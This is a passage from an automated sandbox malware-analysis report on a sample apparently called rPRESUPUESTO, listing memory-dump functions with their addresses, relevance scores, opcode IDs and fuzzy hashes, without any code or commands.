                                                • Instruction ID: cc3d6898f2677fe04cc2246313045655a9b932b5419b99bd9809af0bc429ceb9
                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                • Instruction Fuzzy Hash: EF218C72A00209EFDF129F98CC44BAEBBF9EF89310F204859F915E7251D734DA509B50
                                                Function 01800124 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction ID: 4be04d102d1e26d0f803252f11b014812c448335c7b392feadf28d504b1abdcf
                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction Fuzzy Hash: 3911B273601A09AFD7239B58CC45F9ABBB9EB84794F104029F604DF1D0D671EE44CB55
                                                Function 017D8770 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f626c79c38065a95740176510e4891d6434d3c407508a38cb31dcd040782304
                                                • Instruction ID: 0c94b9bd7301a90da649b9f605161f6dfb8b21ae7f8291f44c4e91a0741f0b7d
                                                • Opcode Fuzzy Hash: 6f626c79c38065a95740176510e4891d6434d3c407508a38cb31dcd040782304
                                                • Instruction Fuzzy Hash: 5B11B2317006199BDB12CF8EC5C0A56FBF9EF8A720B19406EEE08DF304D6B2D9018791
                                                Function 0180AAEE Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction ID: 5be6ca1c64e00a806b1439128b80a8898edc422cf309fbe905eb66f497a7042d
                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                • Instruction Fuzzy Hash: 2F219A72600B09DBD76A8F59C954A26FBE6EB94B10F10896DE546CB650C631EE00CB40
                                                Function 017D80E9 Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 423266678851313ed827cf2cbf03e4e7e73e7f8560a8bc2a0a0fc0032f447e9e
                                                • Instruction ID: 739edebe0ce4a636528cb68ba59edddc3defc28f8fb2c9bf814a3cee67ca6432
                                                • Opcode Fuzzy Hash: 423266678851313ed827cf2cbf03e4e7e73e7f8560a8bc2a0a0fc0032f447e9e
                                                • Instruction Fuzzy Hash: 54215E75A00209DFCB14CF68C581A6EFBF6FB88318F2441ADD105AB351D772AD0ACB91
                                                Function 0180674D Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f18fd598d56252fc67d09ee6fb5da67f248a75717f8db97f2520939c5bf4922
                                                • Instruction ID: ecd4afd26bdc158e03ee4c8b3b842853f266aa3224ed477483f014f4bfbda6ef
                                                • Opcode Fuzzy Hash: 2f18fd598d56252fc67d09ee6fb5da67f248a75717f8db97f2520939c5bf4922
                                                • Instruction Fuzzy Hash: 99219075500A04EFD7618F68CC41F66B7F8FF84754F10892DE59AC7290EA30AA60CB60
                                                Function 017FE8C0 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96a8d1ddeba09514a3d9ecb21740c586ace7c2120341e73ed1b33b966695a170
                                                • Instruction ID: 368b2d2922be565767526f874c4d9c7d4bf2e051d1a90bd313a83054a897c857
                                                • Opcode Fuzzy Hash: 96a8d1ddeba09514a3d9ecb21740c586ace7c2120341e73ed1b33b966695a170
                                                • Instruction Fuzzy Hash: 861125327001149BCB1ACB28CC84A6BB296EFD5770B39493CEB22CB390ED30C912C291
                                                Function 01866870 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8e16344b070f1b2e3d29bbdcd1f67237974e8437dc68ca352c41d41adf15451
                                                • Instruction ID: cf1f9cd95f7e81d883e4e8b6854b4224ca2c4009609e173de189a8a4899ee57c
                                                • Opcode Fuzzy Hash: b8e16344b070f1b2e3d29bbdcd1f67237974e8437dc68ca352c41d41adf15451
                                                • Instruction Fuzzy Hash: B2119472240558EFC722DB6DC944F9AB7ACEF99754F214029F605DB261EA70EA01CB90
                                                Function 018066B0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9922d4246696254b42e29ec17f9f5a87dfee990f3562fe7ad498e58b0323e0d5
                                                • Instruction ID: d014ddbf0dcbc3b06c31f164efeded25d4612fe35dc79b8a1fc6b672e98b7dcd
                                                • Opcode Fuzzy Hash: 9922d4246696254b42e29ec17f9f5a87dfee990f3562fe7ad498e58b0323e0d5
                                                • Instruction Fuzzy Hash: F311C176A0120ADFCB66CF59C984A5ABBF8AF88710B218279D905DB355F670DE10CB90
                                                Function 0189A8E4 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction ID: c0c91b8c2f706935af9379237b9482e699097a7e5275077c3391f1fb504d4e0f
                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                • Instruction Fuzzy Hash: CA11B236A00919AFDF19CB58C805A9DBBF5FF84314F098269EC55E7380E675AE51CB80
                                                Function 017D0AD0 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction ID: 7eedff193bd16933748bf5204730b6a1d49b5c88c11c3d51b5d804a52ff76d39
                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction Fuzzy Hash: D22106B5A00B099FD3A0CF29C440B52BBF4FB48B10F10492EE98ACBB40E371E814CB90
                                                Function 0185E7E1 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction ID: 4f9ae41b85da67565a99b579b5d3246f25d6bb07613d37294315943b2b624c94
                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction Fuzzy Hash: FC119E32600609EFE7619F48CC44B56FBE6EB55755F098429EE09DB260DB31DF40DB90
                                                Function 017F27ED Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d20954f9f3c651ed1106da8490da46690503b0ec4a0fdb7da9ae1fb1ecbed280
                                                • Instruction ID: dd7b053a1816860ae2c53e9a002a5d7729497fef3646b71c3c5da4230c87b9c1
                                                • Opcode Fuzzy Hash: d20954f9f3c651ed1106da8490da46690503b0ec4a0fdb7da9ae1fb1ecbed280
                                                • Instruction Fuzzy Hash: 63012B313456496FE316926DDC9CF27BBDCEF80354F0900A8FA40CB391DA14DD00C2A1
                                                Function 017D4690 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0ea9ef2dfe6f2ac789b498f1c52e2859f2134b317bc793b03611c9597b4789c
                                                • Instruction ID: 354021c7e87b421eb2bc1541d3ad6f9e38e26a81e159496519ae08d830375115
                                                • Opcode Fuzzy Hash: d0ea9ef2dfe6f2ac789b498f1c52e2859f2134b317bc793b03611c9597b4789c
                                                • Instruction Fuzzy Hash: A311C276240649AFEB25CF59D944F56BBB8EB85B74F064119F9069BA50C370E800CF60
                                                Function 018A4B00 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60e15e8429315ae680f5af660242ba2571d8a42e7ae45aa281f87a3bf7c2cf5f
                                                • Instruction ID: b2e6c9dd1590eb0fe2ffb34ab622d41433be5995edd52e9dd012d824972576c9
                                                • Opcode Fuzzy Hash: 60e15e8429315ae680f5af660242ba2571d8a42e7ae45aa281f87a3bf7c2cf5f
                                                • Instruction Fuzzy Hash: E0110632200601DFEB21DAADD844F17F7A5FFC4311F594419E642C7290DA70AA03CB90
                                                Function 01806620 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4648f2a3110240c68ccc894d8e729d363c01ec2b91d9d692315b82589cd919b5
                                                • Instruction ID: f7f5a61e06285da1895b00a0b6e28813ab847b22192c11b42c885475ad51871e
                                                • Opcode Fuzzy Hash: 4648f2a3110240c68ccc894d8e729d363c01ec2b91d9d692315b82589cd919b5
                                                • Instruction Fuzzy Hash: 6A11C272A00719EBDB62DF59CD80B5EFBB8EF48750F640459DA11E7284E730EE118B60
                                                Function 017FEA2E Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f297f68c8ed6e2d7e3a0c9d20a9b0ce861a9b86e7f1d3dbcce9aac139d24ba81
                                                • Instruction ID: 54fad031dde3548348d94b4e23d77d2d49847e7e2050847477fd3bd785a29ccb
                                                • Opcode Fuzzy Hash: f297f68c8ed6e2d7e3a0c9d20a9b0ce861a9b86e7f1d3dbcce9aac139d24ba81
                                                • Instruction Fuzzy Hash: E2016D716002099FCB259B19E448E26FBF9FB95714F25817EE2058B664CA70AE46CB90
                                                Function 017FE53E Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction ID: 1f93b26b2124e1a8471085a6501269e8559a6307c17faeb0d0d82e9512a24ce1
                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction Fuzzy Hash: AB11C6716016C69BE722971C894CB25B7D4BB80748F1E00E4DF41C7792F728CA42C2D2
                                                Function 0185E75D Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction ID: 4409b90c826066db06505625c8c157c7dffbada0bf2627b784e8ab079e7d2ef4
                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction Fuzzy Hash: 0501D232600509AFE7619F58CD44F5AFFA9EB45754F058064EE09DB260E771DF40C790
                                                Function 017CA250 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction ID: 2204271e06aa5975f076622b2025510af543573a6540b2b1127e9dff5ac66e08
                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction Fuzzy Hash: B40126324087399BDB318F19D840A32BBF6EF99B66700852DFC958B281E331D400CB60
                                                Function 018A4940 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f52050f635acf3f089234a227fde2ce3d633fb90dc4e1094f10d005683042ad
                                                • Instruction ID: d9e4b21f685b6e81e69d898d93e58c4c712decb9fdd216fe6c0d29c5bb3462e8
                                                • Opcode Fuzzy Hash: 9f52050f635acf3f089234a227fde2ce3d633fb90dc4e1094f10d005683042ad
                                                • Instruction Fuzzy Hash: E60104325412019FEB32DF1C8804E12B7E8EB85370B6D4265E968DB1B6D770DE21CB80
                                                Function 0184E1D0 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d013f92a8b8eea062c5cbb522f5da640f74e48b5462d4074e2106d4e7791fcf3
                                                • Instruction ID: 599fbde54f468bb42f72a56b3e17c6bdc8971b1ac0eddb6bb01320426cec69be
                                                • Opcode Fuzzy Hash: d013f92a8b8eea062c5cbb522f5da640f74e48b5462d4074e2106d4e7791fcf3
                                                • Instruction Fuzzy Hash: 7A11A132241645EFDB15EF19CD94F16BBB8FF54B44F2400A5F905DB661C635EE01CA90
                                                Function 017D6259 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36c4631cfc62dfd94943412c0e203b535fa1ad7e7a14bd154bb70b51680d2838
                                                • Instruction ID: 12a7958d83a43c03d4eb88af87d32ad94c48679788b5ebe17c28ec00c0762f59
                                                • Opcode Fuzzy Hash: 36c4631cfc62dfd94943412c0e203b535fa1ad7e7a14bd154bb70b51680d2838
                                                • Instruction Fuzzy Hash: 90115E7154121DABDB25EB68CD41FE9B2B9BF04710F6041D4A315E61E0D770AE81CF85
                                                Function 01856050 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50f48ab0b98522c0b0fc1a045b46b20b0f6eef2a87f72b36d25005e9b5f4657a
                                                • Instruction ID: 74ba7c56fda24807191e2b82342a5b9d1e1381cc4feabf42b4018bb6d468ca23
                                                • Opcode Fuzzy Hash: 50f48ab0b98522c0b0fc1a045b46b20b0f6eef2a87f72b36d25005e9b5f4657a
                                                • Instruction Fuzzy Hash: 37111B7390011DABCB11DB94CC84DDFBBBCEF48358F044166A906E7211EA34AB55CBA1
                                                Function 017D208A Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction ID: dff865ee1a2afbf71926f1b3063e9621f121d1e430a3128bdc7a0a6af0d9589e
                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction Fuzzy Hash: 760128322001148BEF128A2DD884B52F777BFC4700F5941A5EE01CF247DA71CC82C7A0
                                                Function 01866500 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 359f82f5f74f8154436bf6428205d3513dbd442480bdfd736b3542c78883bc81
                                                • Instruction ID: 47bd915d1e046692dd87687f1eb18d2f80858cc5e0b83650c5a3cd9559d6a510
                                                • Opcode Fuzzy Hash: 359f82f5f74f8154436bf6428205d3513dbd442480bdfd736b3542c78883bc81
                                                • Instruction Fuzzy Hash: 3911CE326001869FC701CF18C800BA2BBB9BB9A314F188159F948CB315E732E980CBA0
                                                Function 0185C810 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df28c985a982db915ab05540cbe6396436e9f3897db86a1e859e297379c607c6
                                                • Instruction ID: 8e25e6f5dcdc7e98f426a4ca8b2a7249bbe77d96e5767b2120d4a14fb9041ae3
                                                • Opcode Fuzzy Hash: df28c985a982db915ab05540cbe6396436e9f3897db86a1e859e297379c607c6
                                                • Instruction Fuzzy Hash: AF11E8B1A002099FCB04DFA9D545AAEBBF8FF58350F14406AA905E7355D674EA018BA4
                                                Function 0187EA60 Relevance: .0, Instructions: 50COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6757461550b67a7c98595e7fa541ab79aa64567f9be5b7f38929f600085a752d
                                                • Instruction ID: 972251e0d868110d4d78716d0d1da6cdef1de3bc68af64360d54b356f68fb76a
                                                • Opcode Fuzzy Hash: 6757461550b67a7c98595e7fa541ab79aa64567f9be5b7f38929f600085a752d
                                                • Instruction Fuzzy Hash: AC01D4311402119FC732BB198548D76FBF9FF72760B1584AEE6459B251CB70DE41CB91
                                                Function 017CC020 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                • Instruction ID: d3f1ae481e8fd5db3cfad6703ae20c5cb16b3ba0236bf5b7d2408a1d112d73a5
                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                • Instruction Fuzzy Hash: BE01D832100B459FEB23D6A9C904FA7BBE9FFC5714F05491DEA46CB540DAB0E582C750
                                                Function 018120F0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 706979c66722abe3ea9e8e7314102bfea1fa782358767c13607cb8023b2e6900
                                                • Instruction ID: 1b6145b9dc7a5d3a6a850da7a86003e78c1a069c84cb2dfac4e8fd1a5b1448b4
                                                • Opcode Fuzzy Hash: 706979c66722abe3ea9e8e7314102bfea1fa782358767c13607cb8023b2e6900
                                                • Instruction Fuzzy Hash: 7C11AD76A0020DEFCB05DF68C840EAE7BBAEB44384F104059E902DB244DB35AE11CB90
                                                Function 0180E5CF Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ee8df0e25c617a3f270d45abf28fecda1cc343f28eac34985f2172ba8762adc
                                                • Instruction ID: 22587a1795d7d793aaa0192329d3ce714c70bea6b7982e5bf11b21a7108a97d2
                                                • Opcode Fuzzy Hash: 9ee8df0e25c617a3f270d45abf28fecda1cc343f28eac34985f2172ba8762adc
                                                • Instruction Fuzzy Hash: F301D471200605BBD211AB39CD88E53F7ECFF997547000569B205C3661DB64EC11C6A0
                                                Function 018669C0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2111fc656ccace8834888747e52bf23f4e6a5e2898a3b8706fdfb487b02e10f
                                                • Instruction ID: f774ed52247804e5df84112635e22fe39aa77dc61f861e26df903d5e2718e1a1
                                                • Opcode Fuzzy Hash: b2111fc656ccace8834888747e52bf23f4e6a5e2898a3b8706fdfb487b02e10f
                                                • Instruction Fuzzy Hash: 2101D8322146469BC320DF7DC849D6AFBECEF58765F214129E959C7180E7309A41C7D1
                                                Function 0185C460 Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6596ab5b7f04f42d409cf4052257eee58eb491910e8dfcb2c8c60805dc9f764e
                                                • Instruction ID: 01f7e2f53145c8d915ca09ff84ff7b3f864f57387d8aa99433b1864424f76fae
                                                • Opcode Fuzzy Hash: 6596ab5b7f04f42d409cf4052257eee58eb491910e8dfcb2c8c60805dc9f764e
                                                • Instruction Fuzzy Hash: 4E113975A0124DABDB15EF68C884EAEBBB9EB48344F004099AD01D7344DB35AA51CB90
                                                Function 0185C97C Relevance: .0, Instructions: 48COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
